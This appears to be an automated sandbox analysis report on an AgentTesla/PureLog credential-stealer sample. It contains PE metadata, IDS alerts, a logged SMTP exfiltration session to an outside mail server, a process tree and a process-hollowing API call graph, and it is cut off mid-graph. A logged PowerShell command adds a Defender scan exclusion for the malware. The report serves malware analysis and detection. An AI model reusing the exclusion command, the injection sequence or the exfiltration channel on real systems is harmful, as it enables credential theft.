                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa32140x57.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x2800.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa80000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xa12740xa14007b5f42db24c3d6ad76bd287088d2eee6False0.9430732194767442data7.913866005602331IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xa40000x28000x2800b06b41b770fbe82b967fce50d72c19fbFalse0.8794921875data7.615675131035001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xa80000xc0x2003087c54681c88823bbda91a44ac83d34False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xa40c80x2356PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9427371213796153
                                              RT_GROUP_ICON0xa64300x14data1.05
                                              RT_VERSION0xa64540x378data0.39414414414414417
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2025-01-09T12:40:55.696232+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.749702199.79.62.115587TCP
                                              2025-01-09T12:40:55.696232+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.749702199.79.62.115587TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 9, 2025 12:41:07.685302019 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:07.690221071 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:07.690291882 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:08.268894911 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:08.273020029 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:08.277852058 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:08.419831038 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:08.444672108 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:08.449589968 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:08.592653036 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:08.598172903 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:08.603023052 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:08.930818081 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:08.931046009 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:08.935841084 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.097039938 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.097232103 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:09.102072954 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.265774965 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.265937090 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:09.271439075 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.425019979 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.425796986 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:09.425951958 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:09.425993919 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:09.426009893 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:09.430716038 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.430747986 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.430792093 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.430802107 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.668251991 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:41:09.711940050 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:41:21.297350883 CET4958853192.168.2.71.1.1.1
                                              Jan 9, 2025 12:41:21.302167892 CET53495881.1.1.1192.168.2.7
                                              Jan 9, 2025 12:41:21.302251101 CET4958853192.168.2.71.1.1.1
                                              Jan 9, 2025 12:41:21.307132959 CET53495881.1.1.1192.168.2.7
                                              Jan 9, 2025 12:41:21.751136065 CET4958853192.168.2.71.1.1.1
                                              Jan 9, 2025 12:41:21.756191969 CET53495881.1.1.1192.168.2.7
                                              Jan 9, 2025 12:41:21.756519079 CET4958853192.168.2.71.1.1.1
                                              Jan 9, 2025 12:42:45.540852070 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:42:45.545887947 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:42:45.889086962 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:42:45.889121056 CET58749702199.79.62.115192.168.2.7
                                              Jan 9, 2025 12:42:45.889225006 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:42:45.889429092 CET49702587192.168.2.7199.79.62.115
                                              Jan 9, 2025 12:42:45.894236088 CET58749702199.79.62.115192.168.2.7
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 9, 2025 12:41:05.526542902 CET5725753192.168.2.71.1.1.1
                                              Jan 9, 2025 12:41:06.525343895 CET5725753192.168.2.71.1.1.1
                                              Jan 9, 2025 12:41:07.524633884 CET5725753192.168.2.71.1.1.1
                                              Jan 9, 2025 12:41:07.677227974 CET53572571.1.1.1192.168.2.7
                                              Jan 9, 2025 12:41:07.677246094 CET53572571.1.1.1192.168.2.7
                                              Jan 9, 2025 12:41:07.677256107 CET53572571.1.1.1192.168.2.7
                                              Jan 9, 2025 12:41:21.296953917 CET53581601.1.1.1192.168.2.7
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 9, 2025 12:41:05.526542902 CET192.168.2.71.1.1.10xc7d1Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                              Jan 9, 2025 12:41:06.525343895 CET192.168.2.71.1.1.10xc7d1Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                              Jan 9, 2025 12:41:07.524633884 CET192.168.2.71.1.1.10xc7d1Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 9, 2025 12:41:07.677227974 CET1.1.1.1192.168.2.70xc7d1No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                              Jan 9, 2025 12:41:07.677246094 CET1.1.1.1192.168.2.70xc7d1No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                              Jan 9, 2025 12:41:07.677256107 CET1.1.1.1192.168.2.70xc7d1No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Jan 9, 2025 12:41:08.268894911 CET58749702199.79.62.115192.168.2.7220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Thu, 09 Jan 2025 17:11:08 +0530
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Jan 9, 2025 12:41:08.273020029 CET49702587192.168.2.7199.79.62.115EHLO 965543
                                              Jan 9, 2025 12:41:08.419831038 CET58749702199.79.62.115192.168.2.7250-md-54.webhostbox.net Hello 965543 [8.46.123.189]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Jan 9, 2025 12:41:08.444672108 CET49702587192.168.2.7199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                              Jan 9, 2025 12:41:08.592653036 CET58749702199.79.62.115192.168.2.7334 UGFzc3dvcmQ6
                                              Jan 9, 2025 12:41:08.930818081 CET58749702199.79.62.115192.168.2.7235 Authentication succeeded
                                              Jan 9, 2025 12:41:08.931046009 CET49702587192.168.2.7199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                              Jan 9, 2025 12:41:09.097039938 CET58749702199.79.62.115192.168.2.7250 OK
                                              Jan 9, 2025 12:41:09.097232103 CET49702587192.168.2.7199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                              Jan 9, 2025 12:41:09.265774965 CET58749702199.79.62.115192.168.2.7250 Accepted
                                              Jan 9, 2025 12:41:09.265937090 CET49702587192.168.2.7199.79.62.115DATA
                                              Jan 9, 2025 12:41:09.425019979 CET58749702199.79.62.115192.168.2.7354 Enter message, ending with "." on a line by itself
                                              Jan 9, 2025 12:41:09.426009893 CET49702587192.168.2.7199.79.62.115.
                                              Jan 9, 2025 12:41:09.668251991 CET58749702199.79.62.115192.168.2.7250 OK id=1tVquT-001OoL-15
                                              Jan 9, 2025 12:42:45.540852070 CET49702587192.168.2.7199.79.62.115QUIT
                                              Jan 9, 2025 12:42:45.889086962 CET58749702199.79.62.115192.168.2.7221 md-54.webhostbox.net closing connection

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:06:41:00
                                              Start date:09/01/2025
                                              Path:C:\Users\user\Desktop\PO23100076.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PO23100076.exe"
                                              Imagebase:0x1c0000
                                              File size:671'744 bytes
                                              MD5 hash:ABEF12C0EC6C52759F2CD9CC5402E593
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:4
                                              Start time:06:41:02
                                              Start date:09/01/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"
                                              Imagebase:0x8b0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:06:41:02
                                              Start date:09/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:06:41:02
                                              Start date:09/01/2025
                                              Path:C:\Users\user\Desktop\PO23100076.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\PO23100076.exe"
                                              Imagebase:0x130000
                                              File size:671'744 bytes
                                              MD5 hash:ABEF12C0EC6C52759F2CD9CC5402E593
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:7
                                              Start time:06:41:02
                                              Start date:09/01/2025
                                              Path:C:\Users\user\Desktop\PO23100076.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\PO23100076.exe"
                                              Imagebase:0x190000
                                              File size:671'744 bytes
                                              MD5 hash:ABEF12C0EC6C52759F2CD9CC5402E593
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:8
                                              Start time:06:41:02
                                              Start date:09/01/2025
                                              Path:C:\Users\user\Desktop\PO23100076.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PO23100076.exe"
                                              Imagebase:0xcd0000
                                              File size:671'744 bytes
                                              MD5 hash:ABEF12C0EC6C52759F2CD9CC5402E593
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.2487084327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:11
                                              Start time:06:41:04
                                              Start date:09/01/2025
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff7fb730000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:10.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:1.3%
                                                Total number of Nodes:238
                                                Total number of Limit Nodes:14
                                                execution_graph 41709 258d7f8 41710 258d83a 41709->41710 41711 258d840 GetModuleHandleW 41709->41711 41710->41711 41712 258d86d 41711->41712 41746 258f898 41747 258f8de 41746->41747 41750 258fa78 41747->41750 41753 258ed70 41750->41753 41754 258fae0 DuplicateHandle 41753->41754 41755 258f9cb 41754->41755 41773 2585908 41775 2585911 41773->41775 41774 2585946 41775->41774 41778 2585990 41775->41778 41784 2585981 41775->41784 41779 25859b3 41778->41779 41780 2585a63 41779->41780 41782 2585990 CreateActCtxA 41779->41782 41783 2585981 CreateActCtxA 41779->41783 41790 2585b68 41779->41790 41780->41775 41782->41779 41783->41779 41785 25859b3 41784->41785 41786 2585a63 41785->41786 41787 2585b68 CreateActCtxA 41785->41787 41788 2585990 CreateActCtxA 41785->41788 41789 2585981 CreateActCtxA 41785->41789 41786->41775 41786->41786 41787->41785 41788->41785 41789->41785 41791 2585b8d 41790->41791 41795 2586070 41791->41795 41799 2586080 41791->41799 41797 25860a7 41795->41797 41796 2586184 41796->41796 41797->41796 41803 2585d10 41797->41803 41801 25860a7 41799->41801 41800 2586184 41800->41800 41801->41800 41802 2585d10 CreateActCtxA 41801->41802 41802->41800 41804 2587110 CreateActCtxA 41803->41804 41806 25871d3 41804->41806 41739 6f08548 41740 6f086d3 41739->41740 41742 6f0856e 41739->41742 41742->41740 41743 6f040bc 41742->41743 41744 6f087c8 PostMessageW 41743->41744 41745 6f08834 41744->41745 41745->41742 41756 6821948 41757 6821982 41756->41757 41758 6821a13 41757->41758 41759 68219fe 41757->41759 41761 68203b8 CreateIconFromResourceEx 41758->41761 41764 68203b8 41759->41764 41763 6821a22 41761->41763 41766 68203c3 41764->41766 41765 6821a09 41766->41765 41768 6822400 41766->41768 41769 6822422 41768->41769 41770 682242f 41769->41770 41771 6822447 CreateIconFromResourceEx 41769->41771 41770->41765 41772 68224d6 41771->41772 41772->41765 41807 6f0660b 41808 6f0661b 41807->41808 41809 6f0659f 41807->41809 41813 6f07220 41809->41813 41830 6f0721b 41809->41830 41810 6f065a6 41814 6f0723a 41813->41814 41815 6f07242 41814->41815 41847 6f07b61 41814->41847 41852 6f0791e 41814->41852 41859 6f0785d 41814->41859 41863 6f0775d 41814->41863 41867 6f07efc 41814->41867 41872 6f07ab9 41814->41872 41877 6f07e79 41814->41877 41881 6f077d8 41814->41881 41886 6f07a96 41814->41886 41891 6f0766b 41814->41891 41896 6f07caa 41814->41896 41900 6f079a9 41814->41900 41905 6f076a8 41814->41905 41910 6f07a46 41814->41910 41815->41810 41831 6f07220 41830->41831 41832 6f07242 41831->41832 41833 6f07a96 2 API calls 41831->41833 41834 6f077d8 2 API calls 41831->41834 41835 6f07e79 2 API calls 41831->41835 41836 6f07ab9 2 API calls 41831->41836 41837 6f07efc 2 API calls 41831->41837 41838 6f0775d 2 API calls 41831->41838 41839 6f0785d 2 API calls 41831->41839 41840 6f0791e 4 API calls 41831->41840 41841 6f07b61 2 API calls 41831->41841 41842 6f07a46 2 API calls 41831->41842 41843 6f076a8 2 API calls 41831->41843 41844 6f079a9 2 API calls 41831->41844 41845 6f07caa 2 API calls 41831->41845 41846 6f0766b 2 API calls 41831->41846 41832->41810 41833->41832 41834->41832 41835->41832 41836->41832 41837->41832 41838->41832 41839->41832 41840->41832 41841->41832 41842->41832 41843->41832 41844->41832 41845->41832 41846->41832 41848 6f07d18 41847->41848 41916 6f05d20 41848->41916 41920 6f05d18 41848->41920 41849 6f07d3a 41924 6f05220 41852->41924 41928 6f05228 41852->41928 41853 6f07938 41854 6f07ae5 41853->41854 41932 6f05171 41853->41932 41936 6f05178 41853->41936 41854->41815 41940 6f05c30 41859->41940 41944 6f05c28 41859->41944 41860 6f077bf 41860->41815 41864 6f07794 41863->41864 41948 6f05eb8 41863->41948 41952 6f05eaf 41863->41952 41864->41815 41864->41864 41868 6f07f02 41867->41868 41870 6f05c30 WriteProcessMemory 41868->41870 41871 6f05c28 WriteProcessMemory 41868->41871 41869 6f07f34 41870->41869 41871->41869 41873 6f07abf 41872->41873 41875 6f05171 ResumeThread 41873->41875 41876 6f05178 ResumeThread 41873->41876 41874 6f07ae5 41875->41874 41876->41874 41879 6f05220 Wow64SetThreadContext 41877->41879 41880 6f05228 Wow64SetThreadContext 41877->41880 41878 6f07e93 41878->41815 41879->41878 41880->41878 41882 6f0806c 41881->41882 41884 6f05c30 WriteProcessMemory 41882->41884 41885 6f05c28 WriteProcessMemory 41882->41885 41883 6f08090 41884->41883 41885->41883 41887 6f07aa4 41886->41887 41889 6f05171 ResumeThread 41887->41889 41890 6f05178 ResumeThread 41887->41890 41888 6f07ae5 41889->41888 41890->41888 41892 6f07677 41891->41892 41894 6f05eb8 CreateProcessA 41892->41894 41895 6f05eaf CreateProcessA 41892->41895 41893 6f07794 41893->41815 41893->41893 41894->41893 41895->41893 41956 6f05b70 41896->41956 41960 6f05b68 41896->41960 41897 6f07cc8 41901 6f079af 41900->41901 41902 6f07ae5 41901->41902 41903 6f05171 ResumeThread 41901->41903 41904 6f05178 ResumeThread 41901->41904 41902->41815 41902->41902 41903->41902 41904->41902 41906 6f07677 41905->41906 41908 6f05eb8 CreateProcessA 41906->41908 41909 6f05eaf CreateProcessA 41906->41909 41907 6f07794 41907->41815 41908->41907 41909->41907 41911 6f07a4c 41910->41911 41912 6f080bc 41911->41912 41914 6f05c30 WriteProcessMemory 41911->41914 41915 6f05c28 WriteProcessMemory 41911->41915 41913 6f07f34 41914->41913 41915->41913 41917 6f05d6b ReadProcessMemory 41916->41917 41919 6f05daf 41917->41919 41919->41849 41921 6f05d6b ReadProcessMemory 41920->41921 41923 6f05daf 41921->41923 41923->41849 41925 6f0526d Wow64SetThreadContext 41924->41925 41927 6f052b5 41925->41927 41927->41853 41929 6f0526d Wow64SetThreadContext 41928->41929 41931 6f052b5 41929->41931 41931->41853 41933 6f051b8 ResumeThread 41932->41933 41935 6f051e9 41933->41935 41935->41854 41937 6f051b8 ResumeThread 41936->41937 41939 6f051e9 41937->41939 41939->41854 41941 6f05c78 WriteProcessMemory 41940->41941 41943 6f05ccf 41941->41943 41943->41860 41945 6f05c30 WriteProcessMemory 41944->41945 41947 6f05ccf 41945->41947 41947->41860 41949 6f05f41 CreateProcessA 41948->41949 41951 6f06103 41949->41951 41953 6f05f41 CreateProcessA 41952->41953 41955 6f06103 41953->41955 41957 6f05bb0 VirtualAllocEx 41956->41957 41959 6f05bed 41957->41959 41959->41897 41961 6f05bb0 VirtualAllocEx 41960->41961 41963 6f05bed 41961->41963 41963->41897 41653 92d01c 41654 92d034 41653->41654 41655 92d08e 41654->41655 41660 4ae512a 41654->41660 41669 4ae43c1 41654->41669 41673 4ae43d0 41654->41673 41677 4ae3954 41654->41677 41661 4ae509c 41660->41661 41663 4ae5133 41660->41663 41661->41655 41662 4ae5199 41666 4ae5197 41662->41666 41696 4ae3a7c 41662->41696 41663->41662 41665 4ae5189 41663->41665 41685 4ae52b0 41665->41685 41691 4ae52c0 41665->41691 41666->41666 41670 4ae43f6 41669->41670 41671 4ae3954 CallWindowProcW 41670->41671 41672 4ae4417 41671->41672 41672->41655 41674 4ae43f6 41673->41674 41675 4ae3954 CallWindowProcW 41674->41675 41676 4ae4417 41675->41676 41676->41655 41678 4ae395f 41677->41678 41679 4ae5199 41678->41679 41681 4ae5189 41678->41681 41680 4ae3a7c CallWindowProcW 41679->41680 41682 4ae5197 41679->41682 41680->41682 41683 4ae52b0 CallWindowProcW 41681->41683 41684 4ae52c0 CallWindowProcW 41681->41684 41682->41682 41683->41682 41684->41682 41686 4ae5264 41685->41686 41688 4ae52bb 41685->41688 41686->41666 41687 4ae5360 41687->41666 41700 4ae5368 41688->41700 41703 4ae5378 41688->41703 41693 4ae52d4 41691->41693 41692 4ae5360 41692->41666 41694 4ae5368 CallWindowProcW 41693->41694 41695 4ae5378 CallWindowProcW 41693->41695 41694->41692 41695->41692 41697 4ae3a87 41696->41697 41698 4ae687a CallWindowProcW 41697->41698 41699 4ae6829 41697->41699 41698->41699 41699->41666 41701 4ae5389 41700->41701 41706 4ae67b0 41700->41706 41701->41687 41704 4ae5389 41703->41704 41705 4ae67b0 CallWindowProcW 41703->41705 41704->41687 41705->41704 41707 4ae3a7c CallWindowProcW 41706->41707 41708 4ae67ca 41707->41708 41708->41701 41713 4ae2080 41715 4ae20b1 41713->41715 41716 4ae21b1 41713->41716 41714 4ae20bd 41715->41714 41719 4ae2ed8 41715->41719 41724 4ae2ec9 41715->41724 41721 4ae2f03 41719->41721 41720 4ae2fb2 41720->41720 41721->41720 41729 4ae41c8 41721->41729 41732 4ae4120 41721->41732 41725 4ae2f03 41724->41725 41726 4ae2fb2 41725->41726 41727 4ae41c8 CreateWindowExW 41725->41727 41728 4ae4120 CreateWindowExW 41725->41728 41727->41726 41728->41726 41735 4ae3928 41729->41735 41733 4ae41fd 41732->41733 41734 4ae3928 CreateWindowExW 41732->41734 41733->41720 41734->41733 41736 4ae4218 CreateWindowExW 41735->41736 41738 4ae433c 41736->41738

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 285 6828740-6828761 286 6828763 285->286 287 6828768-6828854 285->287 286->287 289 6829081-68290a9 287->289 290 682885a-6828978 287->290 293 682978b-6829794 289->293 329 6828984-68289ae 290->329 294 68290b7-68290c0 293->294 295 682979a-68297b1 293->295 297 68290c2 294->297 298 68290c7-68291a0 294->298 297->298 457 68291a6 call 68299e3 298->457 458 68291a6 call 68299f0 298->458 315 68291ac-68291b9 316 68291e3 315->316 317 68291bb-68291c7 315->317 321 68291e9-6829208 316->321 319 68291d1-68291d7 317->319 320 68291c9-68291cf 317->320 323 68291e1 319->323 320->323 326 682920a-6829263 321->326 327 6829268-68292e0 321->327 323->321 338 6829788 326->338 346 68292e2-6829335 327->346 347 6829337-682937a 327->347 334 68289b4-6828a0f 329->334 335 682904f-682907f 329->335 341 6828a11 334->341 342 6828a14-6828a1f 334->342 335->289 338->293 341->342 345 6828f63-6828f69 342->345 348 6828a24-6828a42 345->348 349 6828f6f-6828fec 345->349 376 6829385-682938b 346->376 347->376 353 6828a44-6828a48 348->353 354 6828a99-6828aae 348->354 392 6829039-682903f 349->392 353->354 358 6828a4a-6828a55 353->358 356 6828ab0 354->356 357 6828ab5-6828acb 354->357 356->357 361 6828ad2-6828ae9 357->361 362 6828acd 357->362 364 6828a8b-6828a91 358->364 368 6828af0-6828b06 361->368 369 6828aeb 361->369 362->361 365 6828a93-6828a94 364->365 366 6828a57-6828a5b 364->366 370 6828b17-6828b88 365->370 372 6828a61-6828a79 366->372 373 6828a5d 366->373 374 6828b08 368->374 375 6828b0d-6828b14 368->375 369->368 381 6828b8a 370->381 382 